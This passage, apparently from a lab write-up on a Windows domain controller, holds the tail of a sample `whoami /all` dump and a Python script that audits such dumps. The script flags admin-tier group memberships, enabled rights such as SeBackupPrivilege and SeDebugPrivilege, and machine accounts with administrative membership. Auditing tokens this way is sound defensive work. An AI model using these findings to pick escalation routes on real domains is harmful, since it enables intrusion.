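SOUPEDECODE\Denied RODC Password Replication Group Alias            S-1-5-21-2986980474-46765180-2505414164-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level               Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
"""


def parse_whoami(text):
    """Return {'user', 'user_sid', 'groups': [(name, sid)], 'privileges': {name: state}}."""
    info = {"user": None, "user_sid": None, "groups": [], "privileges": {}}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            continue
        # Skip blanks, underline rows and column headers.
        if not line or set(line) <= set("-= ") or line.startswith(("User Name", "Group Name", "Privilege Name")):
            continue
        if section == "USER INFORMATION":
            m = SID_RE.search(line)
            if m:
                info["user"], info["user_sid"] = line[:m.start()].strip(), m.group(0)
        elif section == "GROUP INFORMATION":
            m = SID_RE.search(line)
            if not m:
                continue
            # Columns are not reliably separated by two spaces, so anchor on the SID
            # and peel the known Type value off the end of what precedes it.
            before = line[:m.start()].rstrip()
            name = before
            for kind in GROUP_TYPES:
                if before.endswith(" " + kind):
                    name = before[:-len(kind)].rstrip()
                    break
            info["groups"].append((name, m.group(0)))
        elif section == "PRIVILEGES INFORMATION":
            parts = line.split()
            info["privileges"][parts[0]] = parts[-1]   # first token is the name, last the state
    return info


def audit_token(text):
    """Summarise why the token in a `whoami /all` dump is privileged."""
    info = parse_whoami(text)
    findings = []
    for name, sid in info["groups"]:
        rid = sid.rsplit("-", 1)[1]
        if sid in PRIVILEGED_SIDS:
            findings.append((name, sid, PRIVILEGED_SIDS[sid]))
        elif sid.startswith("S-1-5-21-") and rid in PRIVILEGED_RIDS:
            findings.append((name, sid, PRIVILEGED_RIDS[rid]))
    enabled = sorted(p for p, state in info["privileges"].items()
                     if p in DANGEROUS_PRIVS and state == "Enabled")
    is_machine = bool(info["user"]) and info["user"].endswith("$")
    return {
        "user": info["user"],
        "is_machine_account": is_machine,
        "privileged_groups": findings,
        "dangerous_privileges": enabled,
        # A computer account with admin-tier membership is a finding in its own right.
        "machine_account_is_admin": is_machine and bool(findings),
    }


if __name__ == "__main__":
    report = audit_token(SAMPLE)
    print(f"{report['user']} (machine account: {report['is_machine_account']})")
    for name, sid, why in report["privileged_groups"]:
        print(f"  privileged group: {name} [{sid}] -> {why}")
    print("  dangerous rights enabled:", ", ".join(report["dangerous_privileges"]))
```

Run against the output in section 8 it reports the two admin-tier groups and the enabled SeBackupPrivilege and SeDebugPrivilege, and marks the result as a machine account holding administrative membership; on a healthy domain controller a computer account should show only Domain Computers and the well-known groups.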